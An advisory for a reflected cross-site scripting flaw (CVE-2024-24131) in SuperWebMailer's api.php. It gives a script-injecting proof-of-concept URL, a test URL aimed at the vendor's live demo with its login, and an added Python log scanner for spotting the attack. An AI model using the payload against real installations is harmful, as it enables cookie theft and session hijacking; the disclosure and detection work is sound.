SuperWebMailer 9.31.0.01799 has a reflective cross-site vulnerability.
This is the vulnerability exploitation reference for CVE-2024-24131
Summary
SuperWebMailer 9.31.0.01799 has a reflective cross-site vulnerability.
Details
SuperWebMailer in version 9.31.0.01799 has a reflection cross-site attack vulnerability caused by api.php directly referencing URLs without filtering.
Proof of Concept (POC)
http://ip:port/api/api.php/%3Cscript%3Ealert(1)%3C/script%3E
Test case
https://newsletter-software-php-script.superwebmailer.de/api/api.php/%3Cscript%3Ealert(1)%3C/script%3E
Login credentials
Username: demo
Password: demo
Impact
If a user or administrator accesses the malicious URL, the cookie may be obtained by an attacker.
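To check whether the request pattern from this report appears in your own web server logs, the following added example (not part of the original report and not SuperWebMailer code) scans access-log lines for markup characters in the path info after /api/api.php/. The log lines are constructed samples in combined log format, and all function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP/[\d.]+"')
# Endpoint named in the report; everything after the trailing slash is path info.
ENDPOINT_RE = re.compile(r'/api/api\.php/(.*)', re.IGNORECASE)
# Characters needed to build markup; not expected in a normal API path segment.
MARKUP_RE = re.compile(r'[<>"\']')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%253C) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path_info(log_line):
    """Return the decoded path info if it carries markup, otherwise None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    path = fully_decode(m.group(1).split("?", 1)[0])  # drop query, then decode
    hit = ENDPOINT_RE.search(path)
    if not hit:
        return None
    info = hit.group(1)
    return info if MARKUP_RE.search(info) else None

def scan(lines):
    """Return (client_ip, decoded_path_info) for every flagged log line."""
    return [(line.split(" ", 1)[0], info)
            for line in lines
            if (info := suspicious_path_info(line)) is not None]

# Constructed sample log lines: the report's request, the same path
# double-encoded, a normal API call, and an unrelated page.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Feb/2024:10:00:01 +0000] "GET /api/api.php/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Feb/2024:10:00:05 +0000] "GET /api/api.php/%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Feb/2024:10:01:00 +0000] "POST /api/api.php HTTP/1.1" 200 1024',
    '198.51.100.4 - - [01/Feb/2024:10:01:09 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG):
        print(f"{ip} sent markup in api.php path info: {info!r}")
```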